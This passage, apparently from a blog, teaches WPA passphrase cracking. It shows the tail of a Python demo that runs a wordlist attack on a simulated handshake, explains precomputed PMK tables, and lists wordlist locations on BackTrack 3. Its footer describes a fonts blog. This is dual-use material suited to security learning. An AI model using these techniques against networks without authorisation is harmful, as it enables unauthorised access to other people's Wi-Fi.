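    frame = build_eapol_key_frame(snonce, eapol_mic(kck, frame))
    return ap_mac, client_mac, anonce, snonce, frame


if __name__ == "__main__":
    handshake = make_handshake("MyWifiNet", "correct horse")
    print(crack("MyWifiNet", *handshake, ["password", "linksys", "correct horse"]))
```

Because the PMK depends only on the passphrase and SSID, it can be precomputed per SSID (that is what coWPAtty's hash tables do), but a passphrase absent from the wordlist is never found, which is the point made above.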



Finding a Good Dictionary


You need a good dictionary to crack WPA. The Backtrack 3 CD has wordlist files at the following locations:


/usr/local/john-1.7.2/password.lst

/pentest/fuzzers/spike/src/password.lst

/pentest/fuzzers/spike/src/wordlist

/pentest/password/pico/cowpatty/final-wordlist.txt.gz

/pentest/wireless/aircrack-ng/test/password.lst

/pentest/wireless/eapmd5pass/sample-wordlist.txt

/opt/windows-binaries/wordlist.txt.gz

Also, aircrack FAQ page has an extensive list of places where you can download good wordlists from. In addition, I found a good wordlist called 9-final-wordlist.zip here.



About This Blog

This blog seeks to share useful information on freely available fonts on the Internet. Thanks for visiting the blog and posting your comments.

© Contents by KBlog

© Blogger template by Emporium Digital 2008
